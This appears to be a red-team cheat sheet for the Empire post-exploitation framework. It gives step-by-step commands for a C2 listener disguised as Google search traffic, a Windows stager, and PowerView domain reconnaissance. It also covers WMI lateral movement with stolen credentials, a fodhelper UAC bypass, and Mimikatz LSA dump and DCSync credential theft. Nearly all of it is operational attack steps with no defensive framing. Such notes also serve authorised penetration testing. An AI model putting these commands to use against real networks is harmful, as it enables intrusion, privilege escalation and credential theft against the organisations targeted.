Empire

GitHub - BC-SECURITY/Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.GitHub

1. Installation

git clone https://github.com/BC-SECURITY/Empire.git

cd Empire && sudo ./setup/install.sh

./empire

2. Listeners

*Steps to setup a listener through a redirector with high resilience level in Hacking Infrastructure/Front-line Configuration/C2 Server

Basic options:

listeners

use listener {listener}

set Name {Name}

set Port {Port}

set Host {Host}

execute

To activate HTTPS:

set CertPath /root/Empire/data

Request pattern fuzziness:

set Jitter 1 (4 to 6 seconds)

Masquerading the listener requests:

set DefaultProfile {request_uri} | {user_agent} | {header_1} | {header_2}

*Example of Masquerading the listener requests as Google search queries in Hacking Infrastructure/Front-line Configuration/C2 Server

3. Stagers

Usestager windows/launcher_bat

set Listener https_1

generate

4. PowerView embedded modules

usemodule powershell/situational_awareness/network/powerview/get_group

usemodule powershell/situational_awareness/network/powerview/get_user

usemodule powershell/situational_awareness/network/powerview/get_computer

usemodule powershell/situational_awareness/network/powerview/share_finder

usemodule powershell/situational_awareness/network/powerview/get_ou

usemodule powershell/situational_awareness/network/powerview/share_finder

Empire keeps a transcript of all commands, outputs, and files downloaded in the Empire/downloads/<agent_name> folder. The results of all the previous commands are stored in the agent.log file within that folder.

For example, to search for the string "Domain Admins":

grep -A10 "CM=Domain Admins" agent.log

5. Lateral movement

Checking information from the previous modules about users we have creds, we pass those creds to the invoke_wmi module and target the server we want to move.

creds add {Domain} {username} {password}

usemodule lateral_movement/invoke_wmi

set Listener https_1

set CredID 1

set ComputerName {computer-name}

run

6. Privesc modules

Empire marks admin sessions with a small star (*) next to the username.

To dig out users with at least local admin privileges over their workstations, we look for users with an admincount attribute greater than zero.

If we already have this information available in the results of the previous recon modules (get_user) we can grep for those users:

grep -E -B2 "admincount \s+: 1" agent.log

Empire contains a module that attempts to start a process in admin mode. This leads to the familiar Windows dialog asking for elevated credentials to execute the new process:

usemodule privesc/ask

set Listener https_1

run

Although we are in an admin account, we could be in an Empire session that is not currently using these full admin privileges.

To swap this low-privileged context for an admin one, we need too approve a prompt that's being displated on the graphical interface, which we don't have access to, so we can use the following module to bypass this prompt called User Account Control (UAC):

usemodule privesc/bypass_fodhelper

run

7. Mimikatz modules

LSA Dump:

usemodule credentials/mimikatz/lsadump

run

Domain replication abuse (dsync)

usemodule credentials/mimikatz/dcsync

run